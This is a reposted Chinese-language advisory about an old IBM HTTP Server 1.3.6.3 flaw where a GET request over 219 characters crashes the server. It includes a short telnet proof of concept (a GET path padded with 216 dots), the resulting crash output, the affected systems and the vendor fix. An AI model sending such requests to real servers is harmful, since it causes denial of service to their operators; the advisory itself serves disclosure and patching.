通过提交超长的GET请求导致IBM HTTP Server远程溢出

A海浪中的风帆

A海浪中的风帆

2016-01-29 12:45

通过提交超长的GET请求导致IBM HTTP Server远程溢出,通过提交超长的GET请求导致IBM HTTP Server远程溢出
涉及程序:
GET

(本文来源于图老师网站,更多请访问http://m.tulaoshi.com/java/)

描述:
通过提交超长的GET请求导致IBM HTTP Server远程溢出


详细:
IBM 的 HTTP 服务器是一个 web 服务器。在 Windows NT 使用的版本中存在拒绝服务的漏洞。

如果提交一个超过219个字符的 GET 请求,将导致服务器停止响应,并报错。要恢复服务正常工作需要重新启动应用程序。成功的利用该漏洞,攻击者可在受害的主机上执行任何代码。(但这还未得到完全证实。)


以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


$ telnet target 80
GET /......(216个".")aaa HTTP/1.0

(本文来源于图老师网站,更多请访问http://m.tulaoshi.com/java/)

则系统会报告下列错误信息:
***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI
ON_NOT_HANDLED.
***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe
注意:目标主机运行在Windows 2000下。

受影响的系统
IBM HTTP Server 1.3.6.3
- TurboLinux Turbo Linux 3.0.1
- Sun Solaris 2.6
- S.u.S.E. Linux 6.1
- S.u.S.E. Linux 6.0
- RedHat Linux 6.0 sparc
- RedHat Linux 5.2 sparc
- Microsoft Windows NT 4.0
- IBM AIX 4.2.1
- Caldera OpenLinux 2.2

解决方案:
IBM 已经在 1.3.12 版本中解决了此问题,下载地址:
http://www-4.ibm.com/software/webservers/httpservers/download.html

展开更多 50%)
分享

猜你喜欢

通过提交超长的GET请求导致IBM HTTP Server远程溢出

Java JAVA基础
通过提交超长的GET请求导致IBM HTTP Server远程溢出

IBM HTTP Server 远程溢出漏洞

Web开发
IBM HTTP Server 远程溢出漏洞

s8lol主宰符文怎么配

英雄联盟 网络游戏
s8lol主宰符文怎么配

AJAX Http请求

Web开发
AJAX Http请求

五、读取HTTP请求头

Java JAVA基础
五、读取HTTP请求头

lol偷钱流符文搭配推荐

英雄联盟 网络游戏
lol偷钱流符文搭配推荐

通过C API远程连接Mysql Server

编程语言 网络编程
通过C API远程连接Mysql Server

通过HTTP访问SQL Server 2000数据库

SQLServer
通过HTTP访问SQL Server 2000数据库

lolAD刺客新符文搭配推荐

英雄联盟
lolAD刺客新符文搭配推荐

Sun Java Web Server 能让攻击者远程执行任意命令

Sun Java Web Server 能让攻击者远程执行任意命令

WebBrowser应用

WebBrowser应用
下拉加载更多内容 ↓